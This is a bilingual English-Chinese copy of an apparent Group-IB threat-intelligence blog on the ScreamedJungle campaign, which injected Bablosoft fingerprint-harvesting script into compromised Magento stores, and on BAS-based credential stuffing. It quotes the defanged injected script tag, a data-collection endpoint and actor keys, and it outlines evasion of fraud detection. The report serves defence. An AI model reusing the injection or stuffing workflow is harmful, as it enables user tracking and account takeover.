文章由豆包的沉浸式翻译和语雀插件生成。原文请查看:

https://www.group-ib.com/blog/fingerprint-heists

全文总结

本文主要介绍了网络欺诈者利用浏览器指纹识别进行恶意活动的情况，包括收集方法、影响以及相关工具和技术。

重要亮点

• • 浏览器指纹识别的风险：欺诈者利用浏览器指纹识别技术窃取用户唯一数字标识符，进行欺诈活动。该技术具有不可见性，受害者可能不知道指纹已被捕获或滥用，这可能导致个人帐户被锁定和企业安全系统失效。
• • 恶意活动分析：Group-IB 威胁情报和欺诈保护专家发现自 2024 年 5 月以来，威胁行为者入侵 Magento 网站，注入恶意代码收集用户指纹。该恶意代码隐藏在 HTML 注释标签中以使其看起来合法，会收集用户的浏览器设置、插件列表等多种信息并发送到威胁行为者的私有数据库。
• • Bablosoft 工具：Bablosoft 开发的自动化工具常与网络犯罪活动相关，其核心产品 BrowserAutomationStudio（BAS）可用于自动化浏览器活动，结合 FingerprintSwitcher 模块可模拟合法用户行为降低被检测的可能性。BAS 套件在地下社区被广泛用于恶意活动。
• • 凭据填充攻击：攻击者在凭据填充活动中利用 Bablosoft 和 FingerprintSwitcher 等技术，通过导入凭据列表、绘制目标网站登录流程等方式进行攻击。指纹欺骗可绕过检测，被盗的用户指纹可能导致合法用户被错误阻止。
• • 攻击流程：包括识别目标、搜索凭据列表、利用 Browser Automation Studio 进行资源开发和账号访问、绕过欺诈保护系统以及执行欺诈和货币化等阶段。其中绕过欺诈保护系统的方法包括使用第三方 CAPTCHA 破解模块和电话验证模块，以及利用 PerfectCanvas 技术进行指纹欺骗。

原文沉浸式翻译

Introduction导言

Fraudsters are continuously seeking innovative ways to exploit unsuspecting internet users. One of the latest and most concerning techniques revolves around browser fingerprinting — a method that allows cybercriminals to steal unique digital identifiers associated with user online activity.欺诈者不断寻求创新方法来利用毫无戒心的互联网用户。最新和最令人担忧的技术之一围绕着浏览器指纹识别——一种允许网络犯罪分子窃取与用户在线活动相关的唯一数字标识符的方法。

What makes browser fingerprinting particularly alarming is its invisibility. The victim might not even know that the fingerprint has been captured or misused. Fraudsters can bypass security measures, impersonate victims on trusted platforms, and commit fraudulent activities—all without triggering suspicion from security systems that rely on these fingerprints for authentication.让浏览器指纹识别特别令人担忧的是它的不可见性。受害者甚至可能不知道指纹已被捕获或滥用。欺诈者可以绕过安全措施，在受信任的平台上冒充受害者，并进行欺诈活动，所有这些都不会引起依赖这些指纹进行身份验证的安全系统的怀疑。

The implications are far-reaching, affecting individuals and organisations alike. Companies that rely on browser fingerprinting to detect fraud or prevent account takeovers may find their systems rendered ineffective. For individuals, the theft of a fingerprint can result in unexpectedly being locked out of accounts on different online services due to false positives triggered by fraud protection or security systems.其影响是深远的，对个人和组织都有影响。依靠浏览器指纹识别来检测欺诈或防止帐户接管的公司可能会发现他们的系统变得无效。对于个人来说，指纹被盗可能会导致由于欺诈保护或安全系统触发的误报而意外地被锁定在不同在线服务的帐户之外。

In this blog, we’ll delve into how browser fingerprints are collected, the methods fraudsters use to steal and exploit them, and the steps you can take to protect yourself. Whether you’re an individual user or a business looking to enhance security, this guide will provide the insights to stay one step ahead of cybercriminals.在这篇博客中，我们将深入探讨如何收集浏览器指纹、欺诈者用来窃取和利用它们的方法，以及您可以采取哪些措施来保护自己。无论您是个人用户还是希望增强安全性的企业，本指南都将提供领先于网络犯罪分子一步的见解。

Key discoveries in the blog博客中的主要发现

• • Advanced Fingerprinting Techniques: Cybercriminals exploit sophisticated methods to extract unique browser characteristics without user consent.**高级指纹识别技术：**网络犯罪分子利用复杂的方法在未经用户同意的情况下提取独特的浏览器特征。
• • Identified malicious campaign collecting fingerprints of unaware users: a threat actor is compromising Magento websites to inject malicious code aimed at collecting the fingerprints of visiting users.**已发现收集不知情用户指纹的恶意活动：**威胁行为者正在入侵 Magento 网站，以注入旨在收集访问用户指纹的恶意代码。
• • Risks for Individuals: Individuals face potential account lockouts and false positives from fraud protection systems, which can disrupt access to multiple online services.**个人风险：**个人面临潜在的帐户锁定和欺诈保护系统的误报，这可能会中断对多种在线服务的访问。
• • Comprehensive Insight and Protection Strategies: The blog provides an in-depth exploration of how browser fingerprints are collected and exploited, along with practical steps for both businesses and individuals.**全面的洞察和保护策略：**该博客深入探讨了如何收集和利用浏览器指纹，以及适用于企业和个人的实用步骤。

Who may find this blog interesting:谁可能会觉得这个博客有趣：

• • Cybersecurity analysts and corporate security teams网络安全分析师和企业安全团队
• • Malware analysts恶意软件分析师
• • Head of Fraud Protection防欺诈主管
• • Threat intelligence specialists威胁情报专家
• • Cyber investigators网络调查员
• • Computer Emergency Response Teams (CERT)计算机应急响应小组 （CERT）
• • Law enforcement investigators执法调查员
• • Cyber police forces网络警察部队

Fingerprinting Collection Using Compromised Magento Websites使用受感染的 Magento 网站进行指纹采集

Campaign Analysis活动分析

In October 2024, Group-IB threat intelligence and fraud protection specialists identified a malicious campaign that had been ongoing since at least May 2024. In this campaign, a threat actor, now tracked as ScreamedJungle, injected a Bablosoft JS script into compromised Magento websites to collect fingerprints of visiting users. Analyses carried out by Group-IB analysts identified the compromise of more than 115 e-commerce websites.2024 年 10 月，Group-IB 威胁情报和欺诈保护专家发现了一个至少自 2024 年 5 月以来一直在进行的恶意活动。在这次活动中，一个现在被跟踪为 ScreamedJungle 的威胁行为者将 Bablosoft JS 脚本注入受感染的 Magento 网站，以收集访问用户的指纹。Group-IB 分析师进行的分析确定了超过 115 个电子商务网站的入侵。

Although the technique used by the threat actor to compromise Magento online stores is not known with certainty, an analysis of the compromised sites suggests that the threat actor is likely exploiting known vulnerabilities affecting vulnerable Magento versions (e.g., CVE-2024-34102 – CosmicSting, CVE-2024-20720). This assumption is supported by the fact that many of the compromised websites detected use Magento 2.3, which reached end-of-life (EOL) status and has not been supported since September 2022.尽管尚不清楚威胁行为者用来破坏 Magento 在线商店的技术，但对受感染网站的分析表明，威胁行为者可能正在利用影响易受攻击的 Magento 版本的已知漏洞（例如，CVE-2024-34102 – CosmicSting、CVE-2024-20720）。这一假设得到了以下事实的支持：检测到的许多受感染网站都使用 Magento 2.3，该 2.3 已达到生命周期终止 （EOL） 状态，自 2022 年 9 月以来一直不受支持。

Below is an example of an injected script on compromised websites:以下是受感染网站上注入的脚本示例：

Figure 1. Example of injected Bablosoft fingerprinting script on compromised Magento website.图 1.在受感染的 Magento 网站上注入 Bablosoft 指纹脚本的示例。

<script type=”text/javascript” charset=”UTF-8″ src=”hxxps://busz[.]io/j9z3GfPd?pr=1&sub_id_2={victim_domain}”>****

As it is possible to observe from the image above, in most cases the injected script is hidden within an HTML comment tag labeled <!– Google Finger Analytics –> to give it a legitimate appearance. More in general, the behavior of the JS script can be summarized as follows:从上图中可以观察到，在大多数情况下，注入的脚本隐藏在标有“<！– google finger analytics –>”的 HTML 注释标签中，以使其看起来合法。更一般地说，JS 脚本的行为可以总结如下：</！–>

• • The JS script is imported from a malicious domain under the threat actor control, in the above case is hosted on hxxps://busz[.]io/j9z3GfPd?pr=1&sub_id_2={victim_domain}, which redirects to hxxps://busz[.]io/clientsafe.js;JS 脚本是从威胁行为者控制下的恶意域导入的，在上述情况下托管在 hxxps://busz[.]io/j9z3GfPd？pr=1&sub_id_2={victim_domain}，重定向到 hxxps://busz[.]IO/clientsafe.js;
• • If the user visiting the compromised site is using a desktop device, therefore not using any mobile user agent, the ProcessFingerprint function is executed;如果访问受感染站点的用户使用的是桌面设备，因此未使用任何移动用户代理，则执行 ProcessFingerprint 函数;
• • Once the function is executed, several parameters related to the user visiting the compromised web pages are processed and collected (e.g., browser settings, plugin list, font list, systems properties and others);执行该功能后，将处理和收集与访问受感染网页的用户相关的几个参数（例如，浏览器设置、插件列表、字体列表、系统属性等）;

clientsafe.jsclientsafe.js

A deeper analysis of the injected clientsafe.js script revealed that it is part of the Bablosoft BrowserAutomationStudio (BAS) suite; its purpose is to collect users’ fingerprints for later use on the Bablosoft FingerprintSwitcher module.对注入的 clientsafe.js 脚本的更深入分析表明，它是 Bablosoft BrowserAutomationStudio （BAS） 套件的一部分;其目的是收集用户的指纹，以便以后在 Bablosoft FingerprintSwitcher 模块上使用。

Figure 2. FingerprintSwitcher webpage.图 2.FingerprintSwitcher 网页。

More specifically, the threat actor is abusing a BabloSoft’s solution called “CustomServers” which allows them to independently collect fingerprints and store them in a private Bablosoft database.更具体地说，威胁行为者正在滥用 BabloSoft 名为“CustomServers”的解决方案，该解决方案允许他们独立收集指纹并将其存储在私有 Bablosoft 数据库中。

For fingerprints to be saved to the private database, the threat actor must provide the** ProcessFingerprint** function with a public key assigned by BabloSoft when subscribing to the CustomServers service; the public keys identified in the campaign under analysis are as follows:要使指纹保存到私有数据库，威胁行为者必须在订阅 CustomServers 服务时向** ProcessFingerprint** 函数提供 BabloSoft 分配的公钥; 在所分析的活动中标识的公有密钥如下：

5rdc71h00d6udaqhuzgxhga02ewj095nvrk6nxah6vhrb70wqmu854mevhe27mgv5rdc71h00d6udaqhuzgxhga02ewj095nvrk6nxah6vhrb70wqmu854mevhe27mgv

Xc3blub4pxwvxhj0oc4ddtqgkkpm42my84uqo7hyv6zwfetg7hiwnnl9wlzwnso7Xc3blub4pxwvxhj0oc4ddtqgkkpm42my84uqo7hyv6zwfetg7hiwnnl9wlzwnso7

Figure 3. An excerpt of CustomServers documentation.图 3.CustomServers 文档的摘录。

The** clientsafe.js** script connects to Bablosoft’s server, retrieves encoded instructions like the PerfectCanvas request, and uses the eval function to run decoded instructions in the browser of visitors of the compromised website. More details about PerfectCanvas and CustomServers are described later in the blog.** clientsafe.js** 脚本连接到 Bablosoft 的服务器，检索编码指令（如 PerfectCanvas 请求），并使用 eval 函数在受感染网站访问者的浏览器中运行解码的指令。有关 PerfectCanvas 和 CustomServers 的更多详细信息，请参阅稍后的博客。

Figure 4. How PerfectCanvas is generated on the CustomServer side.图 4.如何在 CustomServer 端生成 PerfectCanvas。

In addition, the clientsafe.js script contains several other functions to collect information about the system and browser of users visiting the compromised website, such as:此外，clientsafe.js 脚本还包含其他几个功能，用于收集有关访问受感染网站的用户的系统和浏览器的信息，例如：

• • GetSystemFontData 获取systemFontData
• • GetWebGPUData 获取 WebGPUData
• • getInstalledExtensionsgetInstalledExtensions
• • GetBatteryInfo 获取电池信息
• • GetWindowPropertiesGetWindowProperties
• • GetDoNotTrackGetDoNotTrack
• • GetHLSSupport GetHLSS支持
• • GetCodecsData GetCodecsData
• • GetUserAgentData GetUserAgentData
• • GetMediaDevices 获取媒体设备
• • GetVoicesGetVoices
• • GetBluetoothData 获取蓝牙数据
• • GetKeyboardLayout GetKeyboardLayout
• • GetStorageSizeGetStorageSize （获取存储大小）
• • GetFontsGetFonts

As an example, the following is the function that leverages the Keyboard API to verify the layout used by a visiting user:例如，以下是利用键盘 API 验证访问用户使用的布局的函数：

Figure 5. Function that collects information about keyboard layout.图 5.收集有关键盘布局的信息的函数。

All collected data are then sent to Bablosoft hxxps://customfingerprints[.]bablosoft[.]com/save endpoint and saved on the threat actor private database via ServerPoster function.然后，所有收集的数据都会发送到 Bablosoft hxxps://customfingerprints[.]巴布罗软件[.]com/save 端点并通过 ServerPoster 功能保存在威胁行为者私有数据库中。

Figure 6. Function that sends collected data.图 6.发送收集的数据的函数。

Figure 7. ServerPoster function.图 7.ServerPoster 函数。

The following is an example of a POST request to the endpoint, transmitting a JSON payload that includes the obtained fingerprint.以下是向终端节点发送 POST 请求的示例，该请求传输包含获取的指纹的 JSON 负载。

Figure 8. An excerpt of collected fingerprint transmitted via POST request.图8.通过POST请求传输的采集指纹摘录。

Refs:参考：

• • https://urlscan.io/responses/dcc1122bcf60d91acae0703de18ed4ac027f6d3d55eebd1e87c4f4647b2daeca/https://urlscan.io/responses/dcc1122bcf60d91acae0703de18ed4ac027f6d3d55eebd1e87c4f4647b2daeca/

Impact – Case study: Italy****影响-案例研究：意大利

To better understand the impact of the campaign under analysis, we examined nine Italian websites that were compromised in this campaign, some of which appear to still be infected at the time of writing, in order to estimate the amount of users for whom fingerprints may have been collected.为了更好地了解正在分析的活动的影响，我们检查了在这次活动中被入侵的九个意大利网站，其中一些在撰写本文时似乎仍受到感染，以便估计可能收集了指纹的用户数量。

To this end, we utilized publicly available web data to estimate the traffic of the compromised sites, as well as the number of potential daily visitors.为此，我们利用公开可用的网络数据来估计受感染网站的流量，以及潜在的每日访问者数量。

Although, as stated earlier, these are estimated volumes of the traffic received by the websites and could therefore deviate from the actual values, it is possible to observe that only concerning the Italian market, this campaign is able to potentially collect over 200,000 fingerprints of Italian users monthly.尽管如前所述，这些是网站收到的流量的估计量，因此可能与实际值有所不同，但可以观察到，仅就意大利市场而言，该活动每月就可能收集超过 200,000 个意大利用户的指纹。

What is Bablosoft?什么是 Bablosoft？

Bablosoft develops automation tools often linked to cybercriminals activities such as credential stuffing, fraud schemes, and data harvesting.Bablosoft 开发的自动化工具通常与网络犯罪分子活动有关，例如撞库、欺诈计划和数据收集。

Figure 9. Bablosoft webpage.图 9.Bablosoft 网页。

The core product developed by Bablosoft is BrowserAutomationStudio (BAS), a tool for automating browser-based activities that does not require coding skills. It allows users to create scripts that simulate human actions on websites, such as clicking and filling out forms. Threat actors utilize theBAS suite to automate activities against websites, such as credential stuffing attacks, user registrations, and data scraping. Combined with the FingerprintSwitcher module, this setup mimics legitimate user behavior, significantly reducing the likelihood of detection.Bablosoft 开发的核心产品是 BrowserAutomationStudio （BAS），这是一种用于自动化基于浏览器的活动的工具，不需要编码技能。它允许用户创建模拟网站上人类作的脚本，例如单击和填写表单。威胁行为者利用 BAS 套件来自动化针对网站的活动，例如撞库攻击、用户注册和数据抓取。与 FingerprintSwitcher 模块相结合，此设置可模拟合法用户行为，显著降低检测的可能性。

Bablosoft on Underground CommunitiesBablosoft 发表在 Underground Communities 上

The first known mention of BAS dates back to April 2016, when a user under the pseudonym “Atabas” sponsored the tool on PirateHub forum.已知第一次提到 BAS 可以追溯到 2016 年 4 月，当时一位化名“Atabas”的用户在 PirateHub 论坛上赞助了该工具。

Regarding the FingerprintSwitcher module, the first known mention on the web of such a service dates back to February 2017, where user “Twaego”, who is presumed to be one of the developers of the BAS suite, sponsored the creation of the related service on the BlackHatWorld forum.关于 FingerprintSwitcher 模块，网络上首次已知提及此类服务可以追溯到 2017 年 2 月，当时用户“Twaego”被认为是 BAS 套件的开发人员之一，在 BlackHatWorld 论坛上赞助了相关服务的创建。

Figure 11. Introduction of the BAS module to change fingerprints.图 11.引入 BAS 模块以更改指纹。

As mentioned above, the BAS suite, and all related modules, are widely used to carry out malicious activities and are a topic of interest in underground communities. In particular, its use is often seen as an alternative to other web automation tools (e.g., openbullet), for the development of bruteforcers, checkers, autoregisters, scrapers, and more. The following are examples of a post from developers offering their services for the development of targeted BAS projects, and from a user looking for someone who can implement a bruteforcer to target a U.S. bank.如上所述，BAS 套件和所有相关模块被广泛用于执行恶意活动，是地下社区感兴趣的话题。特别是，它的使用通常被视为其他 Web 自动化工具（例如 openbullet）的替代方案，用于开发暴力破解器、检查器、自动寄存器、爬虫等。以下是来自开发人员的帖子示例，这些帖子提供用于开发目标 BAS 项目的服务，以及来自寻找可以实施暴力破解程序以针对美国银行的人的用户的帖子示例。

Figure 13. Forum user looking for a BAS developer to develop a brute-forcer targeting an American bank. English translation: ”Looking for a brut on [REDACTED] Bank, made on BAS or analogs, stable working from 3 months, the deal is strictly through the guarantor, payment only after full verification. Price from 200$.”图13.论坛用户寻找BAS开发人员开发针对美国银行的暴力强制器。英文翻译：“寻找[REDACTED]Bank上的一个brt，在BAS或类似产品上制作，稳定工作3个月，交易严格通过担保人，只有在完全验证后才能付款。价格从200美元起。”

Credentials Stuffing with Bablosoft and FingerprintSwitcher使用Bablosoft和FingerprintSwitcher填充凭据

The technologies discussed above can be exploited by attackers in credential-stuffing campaigns. Credential stuffing is a type of activity where attackers exploit stolen account credentials to attempt unauthorized access to user accounts.攻击者可以在凭据填充活动中利用上述技术。凭据填充是一种活动，攻击者利用被盗的帐户凭据尝试未经授权访问用户帐户。

To automate the process and avoid detection fraudsters can use different tools. By leveraging these capabilities attackers can test thousands of stolen username-password pairs against multiple websites without triggering traditional security mechanisms. Fingerprinting spoofing ensures their requests appear as legitimate user activity, bypassing detection.为了使过程自动化并避免检测，欺诈者可以使用不同的工具。通过利用这些功能，攻击者可以针对多个网站测试数千个被盗的用户名-密码对，而无需触发传统的安全机制。指纹欺骗确保他们的请求看起来像合法的用户活动，绕过检测。

Additionally, stolen user fingerprints can have severe consequences for legitimate users. Fraudsters who reuse stolen device fingerprints can make it appear as though legitimate users’ devices are engaging in fraudulent behavior. As a result, fraud protection systems may wrongfully block legitimate users, flagging their devices as high risk due to association with prior attacks.此外，被盗的用户指纹会给合法用户带来严重后果。重复使用被盗设备指纹的欺诈者会让合法用户的设备看起来像是在从事欺诈行为。因此，欺诈保护系统可能会错误地阻止合法用户，将他们的设备标记为与先前攻击相关的高风险设备。

Note: Since credential-stuffing attacks have different variations, this specific example describes a case in which an attacker uses stolen or compromised credentials to target a specific website. The main goal is the verification of accounts for further exploitation.注意：由于凭据填充攻击有不同的变体，此特定示例描述了攻击者使用被盗或受损凭据来攻击特定网站的情况。主要目标是验证帐户以供进一步利用。

Figure 14. Example of BAS scripts offered in Darknet.图 14.Darknet 中提供的 BAS 脚本示例。

Using BAS, fraudsters can import a list of credentials, map out the login flow of a target website, and configure BAS to input the credentials repeatedly while monitoring for successful authentications enhancing the effectiveness of the attacks.使用 BAS，欺诈者可以导入凭据列表，绘制目标网站的登录流程，并将 BAS 配置为重复输入凭据，同时监控身份验证是否成功，从而提高攻击的有效性。

Figure 15. Fraud Matrix of the Account Stuffing Attack.图 15.Account Stuffing 攻击的欺诈矩阵。

Figure 15 shows tactics and techniques of the Fraud Matrix framework executed during the attack. Below we will go through the major stages with details.图 15 显示了在攻击期间执行的 Fraud Matrix 框架的策略和技术。下面我们将详细介绍主要阶段。

Reconnaissance识别

Fraudsters start by identifying targets for the attack based on factors such as the availability of reused or exposed credentials, the presence of weak security measures, the potential value of compromised accounts, and the ability to efficiently automate attacks using preconfigured tools (e.g., Bablosoft) tailored for specific targets, such as banks or online portals. Then they should more deeply investigate the structure of the targeted website, i.e. the IDs of the HTML elements they have to interact with to emulate the real user.欺诈者首先根据多种因素确定攻击目标，例如重复使用或暴露的凭证的可用性、是否存在薄弱的安全措施、被盗账户的潜在价值，以及使用为特定目标（例如银行或在线门户）量身定制的预配置工具（例如 Bablosoft）有效自动化攻击的能力。然后，他们应该更深入地调查目标网站的结构，即他们必须与之交互以模拟真实用户的 HTML 元素的 ID。

As the next step, fraudsters search for a list of credentials usually referred to as combolist that will be used in credential stuffing attacks against targeted websites. These combo lists can be obtained from various sources like underground forums, and cybercrime communities in Telegram, and then fed into the BAS database as shown on the Figure 16 below.下一步，作弊者会搜索通常称为 combolist 的凭证列表，这些凭证将用于针对目标网站的撞库攻击。这些组合列表可以从各种来源获得，例如地下论坛和 Telegram 中的网络犯罪社区，然后输入到 BAS 数据库中，如下图 16 所示。

Figure 16. Database Manage in BrowserAutomation Studio.图 16.BrowserAutomation Studio中的数据库管理。

Resource development, Account Access资源开发、账号访问

Browser Automation Studio offers a wide range of modules that can facilitate fraudsters’ activity: filesystem and network operations, IP info services, phone verification services and others. Automation of the embedded browser based on Chromium Embedded Framework (CEF). The non-exhaustive list is shown in the Figure 17 below.Browser Automation Studio 提供了广泛的模块，可以为欺诈者的活动提供便利：文件系统和网络作、IP 信息服务、电话验证服务等。基于 Chromium 嵌入式框架 （CEF） 的嵌入式浏览器自动化。下面的图 17 显示了非详尽的列表。

*CEF is an open-source framework for embedding the Chromium browser stack into other applications used by well-known software vendors.*CEF 是一个开源框架，用于将 Chromium 浏览器堆栈嵌入到知名软件供应商使用的其他应用程序中。

Figure 17. Browser Automation Studio Modules.图 17.浏览器 Automation Studio 模块。

Browser Automation Studio could be considered an IDE for visual programming. It has a lot of control blocks that represent common statements and logical statements as shown in Figure 18.Browser Automation Studio 可以被视为可视化编程的 IDE。它有很多代表公共语句和逻辑语句的控制块，如图 18 所示。

Figure 18. Script Logic blocks in Browser Automation Studio.图 18.在浏览器Automation Studio中编写逻辑块。

These control blocks allow for the quick creation of custom scripts that can operate with BAS modules. An example of the script is shown in Figure 19.这些控制块允许快速创建可与 BAS 模块一起运行的自定义脚本。该脚本的一个示例如图 19 所示。

• • The script requests a stolen fingerprint and applies it to an internal browser (step 1)该脚本请求被盗的指纹并将其应用于内部浏览器（步骤 1）
• • reads credentials from the database (step 2)从数据库中读取凭证（步骤 2）
• • opens the website via the internal browser and inputs credentials to the form on the website (step3)通过内部浏览器打开网站，并将凭据输入到网站上的表单中（步骤 3）
• • idle for a while and press “Login” button (step 4) then wait until the page is loaded闲置一会儿，然后按“登录”按钮（第 4 步），然后等待页面加载完毕
• • updates corresponding records in the database in case a specific HTML exists (step 5)如果存在特定 HTML，则更新数据库中的相应记录（步骤 5）

Figure 19. Script Editor in Browser Automation Studio.图 19.浏览器Automation Studio中的脚本编辑器。

Defence evasion (Fraud Protection systems Bypass)防御规避（欺诈保护系统绕过）

Browser Automation Studio offers a wide range of capabilities to bypass fraud protection systems. Some of them are implemented as a part of the Bablosoft ecosystem and others are integrations with third-party services.Browser Automation Studio 提供了广泛的功能来绕过欺诈保护系统。其中一些是作为 Bablosoft 生态系统的一部分实现的，而另一些则是与第三方服务的集成。

For example, CAPTCHA solving modules are implemented by third parties, some of which are generic and some targeting specific well-known CAPTCHA vendors.例如，CAPTCHA 破解模块由第三方实现，其中一些是通用的，而另一些则针对特定的知名 CAPTCHA 供应商。

Figure 20. Captcha Solving Modules in Browser Automation Studio.图 20.Browser Automation Studio 中的 Captcha Solving 模块。

The other example of third-party integration is the phone verification module that allows the use of temporary phone numbers.第三方集成的另一个示例是允许使用临时电话号码的电话验证模块。

Figure 21. The example of phone number verification.图 21.电话号码验证示例。

The most interesting part of the defence evasion capabilities is fingerprint spoofing. It leverages the PerfectCanvas technology.防御规避功能最有趣的部分是指纹欺骗。它利用 PerfectCanvas 技术。

PerfectCanvas****完美画布

PerfectCanvas is a technology that allows BAS to receive fingerprints from real devices to bypass canvas fingerprinting methods of fraud protection systems. The high-level process looks as follows:PerfectCanvas 是一种允许 BAS 从真实设备接收指纹以绕过欺诈保护系统的 canvas 指纹识别方法的技术。高级流程如下所示：

1. 1. The canvas is first rendered on a separate, remote machine.画布首先在单独的远程计算机上渲染。
2. 2. The rendered canvas data is then sent to the local machine.然后，渲染的画布数据将发送到本地计算机。
3. 3. The canvas data in the BAS browser is replaced with the remotely rendered data.BAS 浏览器中的画布数据将替换为远程渲染的数据。

The key difference of this method is that the canvas data transmitted is byte-for-byte identical to that generated on the real device, rather than being obtained by adding noise to the origin canvas.这种方法的主要区别在于，传输的画布数据与真实设备上生成的数据逐字节相同，而不是通过向原始画布添加噪声来获得。

To use PerfectCanvas, the fraudster must visit the targeted site using a specialized browser called CanvasInspector, which is designed to generate the “PerfectCanvas request.”要使用 PerfectCanvas，欺诈者必须使用名为 CanvasInspector 的专用浏览器访问目标站点，该浏览器旨在生成“PerfectCanvas 请求”。

Figure 22. CanvasInpector.图 22.CanvasInpector.

The “PerfectCanvas request” is a string that contains all the necessary information to render the canvas on a remote machine.“PerfectCanvas 请求”是一个字符串，其中包含在远程计算机上渲染画布所需的所有信息。

Figure 23. “PerfectCanvas request” for browserleaks[.]com.图 23.针对 browserleaks 的 “PerfectCanvas request” [.]com 的。

Once the fraudster has the “PerfectCanvas request,” they can obtain fingerprints with the PerfectCanvas replacement by sending a request to the server and receiving a response.一旦欺诈者收到“PerfectCanvas 请求”，他们就可以通过向服务器发送请求并接收响应来获取带有 PerfectCanvas 替代品的指纹。

Figure 24. The PerfectCanvas workflow.图 24.PerfectCanvas 工作流程。

Bablosoft offers fraudsters the CustomServers feature to pre-collect fingerprints and instantly use them in fraudulent transactions. CustomServer — a web server that hosts the clientSafe.js script. As mentioned above, this script generates fingerprints on demand. By injecting into popular websites, fraudsters receive hundreds of thousands of fingerprints from the devices of unaware users per month.Bablosoft 为欺诈者提供 CustomServers 功能，以预先收集指纹并立即将其用于欺诈交易。CustomServer — 托管 clientSafe.js 脚本的 Web 服务器。如上所述，此脚本按需生成指纹。通过注入流行的网站，欺诈者每月从不知情用户的设备中接收数十万个指纹。

Figure 25. The stolen fingerprints abuse via CustomServers.图 25.被盗的指纹通过 CustomServers 进行滥用。

Perform fraud and Monetization执行欺诈和货币化

Once fraudsters prepare their scripts they can run them on previously gathered credentials databases for in-bulk exfiltration of some useful account data e.g., payment details, and personal data. This opens an opportunity for selling more quality and enriched databases.一旦欺诈者准备好他们的脚本，他们就可以在以前收集的凭证数据库上运行这些脚本，以批量泄露一些有用的账户数据，例如支付详细信息和个人数据。这为销售更多高质量和丰富的数据库提供了机会。

Another feature of BrowserAutomationStudio (BAS) is its ability to compile scripts into standalone executable files. This means that once an attacker creates a credential-stuffing script using BAS, they can package it into an executable program that runs independently of the BAS environment. These compiled scripts can be easily distributed, offered, or shared with other fraudsters.BrowserAutomationStudio （BAS） 的另一个功能是它能够将脚本编译成独立的可执行文件。这意味着，一旦攻击者使用 BAS 创建撞库脚本，他们就可以将其打包到独立于 BAS 环境运行的可执行程序中。这些编译的脚本可以很容易地分发、提供或与其他欺诈者共享。

Figure 26. Compile Script window of Browser Automation Studio.图 26.浏览器Automation Studio的编译脚本窗口。

Conclusion结论

Browser fingerprinting is a powerful technique commonly used by websites to track user activities and tailor marketing strategies. However, this information is also exploited by cybercriminals to mimic legitimate user behavior, evade security measures, and conduct fraudulent activities. The identification of a malicious campaign specifically designed to compromise e-commerce websites and collect the fingerprints of unaware users underscores the high value of this information within the cybercriminal community and highlights the need for continued research and analysis of the tools and techniques used for illicit purposes, enabling security teams to improve detection capabilities and strengthen defenses against fraudulent activities.浏览器指纹识别是网站常用的一种强大技术，用于跟踪用户活动和定制营销策略。但是，网络犯罪分子也利用此信息来模仿合法用户行为、逃避安全措施和进行欺诈活动。识别出专门用于破坏电子商务网站并收集不知情用户指纹的恶意活动，凸显了这些信息在网络犯罪社区中的高度价值，并强调了对用于非法目的的工具和技术进行持续研究和分析的必要性，使安全团队能够提高检测能力并加强对欺诈活动的防御。

To this end, we report below some recommendations for the different entities involved in the identified campaign.为此，我们在下面报告了针对已识别活动所涉及的不同实体的一些建议。

For website owners:对于网站所有者：

• • Regularly conduct a website analysis to evaluate its integrity and eliminate any potential persistence mechanisms or malicious files;定期进行网站分析以评估其完整性并消除任何潜在的持久性机制或恶意文件;
• • Keep systems up-to-date and always install relevant security patches;保持系统处于最新状态，并始终安装相关的安全补丁;
• • Use complex passwords and adopt two-factor authentication;使用复杂密码并采用双重身份验证;
• • Monitor accesses of privileged accounts;监控特权帐户的访问;
• • Performs security audits (e.g., vulnerability assessments, penetration tests) periodically in order to identify the presence of any vulnerabilities that could lead to website compromise;定期执行安全审计（例如，漏洞评估、渗透测试），以识别是否存在任何可能导致网站入侵的漏洞;

Advice for end users to limit exposure of their fingerprint:建议最终用户限制其指纹暴露：

• • Use privacy-oriented browsers that implement additional protection measures to block suspicious fingerprint scripts;使用注重隐私的浏览器，实施额外的保护措施来阻止可疑的指纹脚本;
• • Use trusted and reliable browser extensions aimed at blocking the execution of suspicious javascript and detection of tracking techniques;使用值得信赖且可靠的浏览器扩展程序，旨在阻止可疑 javascript 的执行和跟踪技术的检测;

Recommendations for cybersecurity and fraud teams for prevention and detection of attacks with Browser Automation Studio and为网络安全和欺诈团队提供使用 Browser Automation Studio 预防和检测攻击的建议，以及

• • Identify changes in known user environment, i.e. change of operating system and metadata;识别已知用户环境中的更改，即作系统和元数据的更改;
• • Subscribe for intelligence services (i.e. threat intelligence, fraud intelligence) to be updated with evolving fraud schemes and technologies订阅情报服务（即威胁情报、欺诈情报），以根据不断发展的欺诈计划和技术进行更新
• • Use Multi-Factor Authentication (MFA) for authentication processes or sensitive user activity, i.e. for password changing.将 Multi-Factor Authentication （MFA） 用于身份验证过程或敏感用户活动，即密码更改。

Examples of Fraud Matrix mitigations and detections sorted by efficiency:按效率排序的 Fraud Matrix 缓解和检测示例：

High Efficiency****高效率

**Mitigations:**缓解措施：

**Detections:**检测：

Moderate Efficiency****效率适中

Mitigations****缓解措施

Detections****检测

Note: DS2001 is useful for early detection but relies on external sources and doesn’t directly prevent attacks in real time.注意：DS2001 可用于早期检测，但依赖于外部来源，不能直接实时防止攻击。

MITRE ATT&CKMITRE ATT&CK

Figure 27. ScreamedJungle ATT&CK图 27.尖叫丛林 ATT&CK

Indicators of Compromise (IOCs)入侵指标 （IOC）

Network Indicators:网络指标：

来自: Fingerprint Heists | Group-IB Blog